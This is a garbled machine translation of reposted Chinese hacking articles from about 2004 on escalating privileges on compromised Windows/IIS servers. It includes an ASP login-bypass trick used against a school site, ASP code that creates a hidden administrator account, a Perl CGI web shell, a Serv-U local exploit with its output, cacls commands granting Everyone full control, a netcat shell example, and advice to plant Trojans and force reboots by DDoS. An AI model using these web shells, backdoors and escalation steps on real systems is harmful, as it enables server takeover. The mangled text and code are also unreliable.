2. Tech
  3. About ASP Trojan Promotion Permissions [Comprehensive Origin]

About ASP Trojan Promotion Permissions [Comprehensive Origin]

xiaoxiao2021-03-06  15

N years ago, this vulnerability can be used to realize the directory traversal, although Microsoft has a patch, but it seems that the patch is used to limit IIS to only access the virtual directory, so the vulnerability is still existed, but it is only available. For IIS, submit a URL containing% 5C to find files, but other files referenced in the file are not found (% 5c is //'s URL encoding, IIS jumps to the previous directory) Find, of course, can't find; dizziness, haha, I am dizzy).

Later, this vulnerability was excavated by the cattle, but also the legendary 5C branches: due to the relative path of the file references to the database, submit% 5C can't find the file, so IIS will be old and old. Path of the database (do not understand? Looking for Google).

An accidental opportunity I found that you can also use% 5C to bypass the ASP verification; try it when we fails in the branches.

Stapless, look at the following code:

<%

Guest_user = trim (Request ("Guest_USER"))

Guest_password = trim (Request ("Guest_password"))

SET RS = Server.createObject ("AdoDb.Recordset")

SQL = "SELECT * from admin where id = 1"

RS.Open SQL, CONN, 3, 2

Readuser = RS ("Guest_USER")

Readpassword = rs ("Guest_password")

IF readuser <> guest_user or readpassword <> guest_password kil

Response.write "Please enter the correct administrator password!"

Response.end

Else

Session ("admin") = 1 / 'After logging in, write Seesion Save

Response.write ("Successful landing, please return the information page")

END IF

%>

Seeing that there is no, if you want to verify that you must make the username password in the database and submit; what? Let's take a look at the database connection file code:

<%

ON Error ResMe next

Set conn = server.createObject ("adoDb.connection")

Dbpath = server.mappath ("Guestbook.asp")

Conn.open "Driver = {Microsoft Access Driver (* .mdb)}; dbq =" & dbpath

%>

Ah, there is a fault-tolerant statement that cannot be treasure! Wait, if the submission% 5C database can't be found, due to fault, the program will continue, then the username password you get from the database is empty (thinking that sometimes the branches fail is to see the empty frame, because The data is empty), haha, so we will bypass the verification!

Know how to do it, save the landing page to the local, modify the submitted URL, put the last / change to% 5c, username password space (some programs check if the username password is empty, space will be filtered by the program ), Submit, OK. Hey, you don't think that I have nothing to write to the code. In fact, this is a message board program made by our school, just hanging at the home page of the school, huh, huh.

Since understanding the principles, of course, I have to find the actual vulnerability, naturally the "hole" network forum opened by the famous name. But there is a failure because it has such a paragraph:

IF Err THEN

Err.clear

Set conn = Nothing

Response.write "Database connection error, please check the connection string."

Response.end

END IF

The database is not found, huh, huh, empty.

Then go to Down's BBSXP Forum, open the database connection file, halo, there is no tolerant statement; huh, but you can burn.

I am not BT, so I don't look for it, write articles, I will give you a master.

Summarize this condition for this attack method: 1. The relative path for database connection is only a simple fault-tolerant statement; 2. Server IIS version is 4 or 5; 3. If you do not check empty characters or check, filter spaces Filter spaces during comparison; 4, the program cannot be in the first class

As for the prevention, huh, since the attack conditions know, the prevention measures have naturally come out ^ _ ^

- Author: vjoy-- Published: 2004-12-2519: 57: 36-- add .asp code for superuser [original blue screen, Kevin improvements, Ms unpublished vulnerabilities] Author: blue, Kevin Article Source: Ice point limit In fact, I have tested in my broiler and Kevin, as well as Hippo epic. The result is a user who successfully added the Administrators group under User permission (although I can't believe my eyes) The last time Kevin does not speak, I don't dare to release it .... Now I have seen him on his blog, it turns back (I have improved a little more than I last test, add a form. ). Everyone has a blessing `` `Anster code is right, but very few can succeed, do it. . Oh, the next step I want to integrate him into the ocean.嘿嘿.

.NETWORK Object Script Permissions Lifting Vulnerability Utilization Tool

User: < Br> Password:
<% @ codepage = 936on error resume nextif request.serverVariables "Remote_addr") <> "127.0.0.1" ThenResponse.write "IP! S N0t Right" Elseif Request ("UserName") <> "" "" "" "" "" "" "" "passwd") response. Expires = 0

Session.Timeout = 50

Server.scripttimeout = 3000

Set lp = server.createObject ("wscript.network")

Oz = "Winnt: //" & lp.computername

Set ob = GetObject (oz)

Set oe = getObject (oz & "/ administrators, group")

Set = obs.create ("User", Username)

Od.setPassword Passwd

Od.setInfo

OE.Add Oz & "/" & username

IF Err THEN

Response.write "~~ Don't buy 6 1 today ... 2 yuan to buy a bottle can be happy ..."

Else

IF INSTR ("Wscript.Shell"). EXEC ("cmd.exe / c net user" & username.stdout.readall, "Last Login"> 0 THEN

"Although there is no mistake, it seems that it is not established. You must be very depressed."

Else

Response.write "OMG!" & Username & "account is actually become! This is an unknown vulnerability. 5,000,000RMB is your" "

END IF

END IF

Else

Response.write "Please enter the user name"

END IF

END IF

%>

- Author: vjoy-- Published: 2004-12-2519: 58: 10-- elevated privileges ultimate skills

Author: WekweN

http://www.wrsky.com

This article combines many masters to improve the skills and some ideas

When we get a WebShell, the next thing to do is to improve the permissions.

Personal summary is as follows:

1: c: // Documents and settings // all users // application data // symantec // pcanywhere can jump to this directory, if the line is the best, directly under its CIF file, get the PCANywhere password , Login PS:

Crack tools are available. Please ask yourself!

2.c: // WinNT // System32 // Config Enhances here

SAM, crack the user's password

Software for cracking SAM password

LC,

Saminside

3.c: // Documents and settings // all users // "Start" menu // Program See here can jump, we can get a lot of useful information from here

You can see a lot of shortcuts, we generally choose Serv-U, then view attributes locally, know if the path, see if you can jump

After entering, if there is permission to modify servudaemon.ini, add a user, password is empty

[User = wekwen | 1]

PASSWORD =

Homedir = C: Timeout = 600

Maintenance = system

Access1 = c: // | rwamelcdp

Access1 = d: // | rwamelcdp

Access1 = f: // | rwamelcdp

SKEYVALUES =

This user has the highest permission, then we can ftp to Quote Site Exec XXX to improve permissions

4.C: // Winnt // System32 // inetsrv // Data is this directory, the same is ERVERYOE, what we have to do is uploading the tools of the promotion permissions, then execute

5. See if you can jump to the following directory

C: // PHP, with phpspy

C: // PREL, sometimes it is not necessarily this directory (you can also know the attribute by downloading the property) WebShell with CGI

#! / usr / bin / perl

BinMode (stdout);

Syswrite (stdout, "content-type: text / html // r // n // r // n", 27);

$ _ = $ Env {query_string};

S /% 20 / / g;

S /% 2F / Ig;

$ execTHIS = $ _;

Syswrite (stdout, " 

 // r // n", 13);


Open (stderr, "> & stdout") || DIE "CAN / 'T Redirect Stderr";


System ($ exECTHIS);


Syswrite (stdout, "// r // n   // r // n", 17);


Close (stderr);


Close (stdout);


EXIT;


Save as CGI execution,


If you can't, you can try the PL extension, change the CGI file just now to the PL file, submit


http: //ANYHOST / RMD.PL? DIR


Display "Reject Access", indicating that it can be executed! Submit right now: first upload a Su.exe (SER-U upgrade authority) to the Prel's bin directory


http: //anyhost/ -cmd.pl? c // perl // bin // su.exe


return:


Serv-U> 3.x local exploit by xiaolu


USAGE: Serv-U.exe "Command"


Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" is now IUSR permissions, submitted:


http://enyhost//cmd.pl? c // perl // bin // su.exe "Cacls.exe C: / E / T / G Everyone: F"


http: //Anyhost/ -cmd.pl? c // perl // bin // su.exe "Cacls.exe D: / E / T / G Everyone: F"


Http: //Anyhost/ -cmd.pl? c // perl // bin // su.exe "Cacls.exe E: / E / T / G Everyone: F"


http: //Anyhost//cmd.pl? c // perl // bin // su.exe "Cacls.exe f: / e / t / g everyone: f"


If the following information is returned, it will be successful.


Serv-U> 3.x local exploit by xiaolu


<220 Serv-U FTP Server V5.2 for Winsock Ready ...


> User Localadministrator


<331 User Name Okay, Need Password.


*********************************************************** ****


> Pass #l@ * * @p


<230 user logged in, proced.


*********************************************************** ****


> Site maintenance


*********************************************************** ****


CREATING New Domain ...


<200-DomainID = 2


<220 Domain Settings Saved


*********************************************************** ****


Domain XL: 2 Created


Creating Evil User


<200-user = XL


200 User Settings Saved


*********************************************************** ****


[ ] Now exploiting ...


> User XL


<331 User Name Okay, Need Password.


*********************************************************** ****


> Pass 111111


<230 user logged in, proced.


*********************************************************** ****


[ ] Now Executing: Cacls.exe C: / E / T / g Everyone: f


<220 Domain Deleted


Such all partitions are completely controlled for EVERYONE


Now we upgrade your users as an administrator:


http://enyhost/ -cmd.pl? c // perl // bin // Su.exe "Net localgroup administrators IUSR_Anyhost / Add"


6. You can successfully run "CScript c: //inetpub//adminscripts//adsutil.vbs get w3svc / inprocsusapiapps" to improve permission to use this CScript c: //inetpub//adminscripts//adsutil.vbs Get W3SVC / Inprocessisapiapps


View DLL file with privilege: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll


Add ASP.DLL to the privilege


Asp.dll is placed in c: //winnt//system32//inetsrv//asp.dll (the location of different machine places is not necessarily the same)


We now add CScript Adsutil.vbs SET / W3SVC / InProcessisapiapps "C: //winnt//system32//iDQ.dll" "c: //winnt//system32/ -/inetsrv//httpext.dll" C: / /Winnt//system32//inetsrv/Httpodbc.dll "C: //winnt//system32//inetsrv/sinc.dll" "c: //winnt//system32//msw3prt.dll" C: //winnt//system32//inetsrv//asp.dll "


You can use the cscript adsutil.vbs get / w3svc / inprocessisapiapps to see if it is added.


7. You can also use this code to try to improve, as if the effect is not obvious


<% @ codepage = 936%> <% response.expires = 0


ON Error ResMe next


Session.Timeout = 50


Server.scripttimeout = 3000


Set lp = server.createObject ("wscript.network")


Oz = "Winnt: //" & lp.computername


Set ob = GetObject (oz)


Set oe = getObject (oz & "/ administrators, group")


Set = obs.create ("User", "Wekwen $")


Od.SetPassword "wekwen" <----- password


Od.setInfo


Set of = getObject (Oz & "/ Wekwen $, User")


OE.Add (of.adspath)


Response.write "Wekwen $ Super Account Establishment!"%>


Check if this code is checked


<% @ codepage = 936%>


<% Response.expires = 0


ON Error ResMe next / 'Find administrators group account


Set tn = server.createObject ("wscript.network")


Set objgroup = getObject ("Winnt: //" & Tn.computername & "/ administrators, group")


For Each Admin In Objgroup.members


Response.write admin.name & "
"


NEXT


IF Err THEN


Response.write "No: wscript.network" endiff


%>


8.c: // program files // java web start This is here, generally small, you can try to use JSP's WebShell, I heard that the permissions are small, I have not met.


9. Finally, if the host setting is very metamorphosis, you can try the C: // Documents and Settings // All Users // "Start" menu // program // Start "to write to BAT, VBS and other Trojans.


Wait until the host restarts or you DDOS forced it to restart to achieve the purpose of enhancement.


Summary, find the directory with execution and writing, what catalog, and then upload the improvement tool, finally executed, three words "find" "on" "execution"


The above is my own, everyone has a lot of ways to share


Wekwen


04.12.12
转载请注明原文地址:https://www.9cbs.com/read-47939.html

9cbs

New Post(0)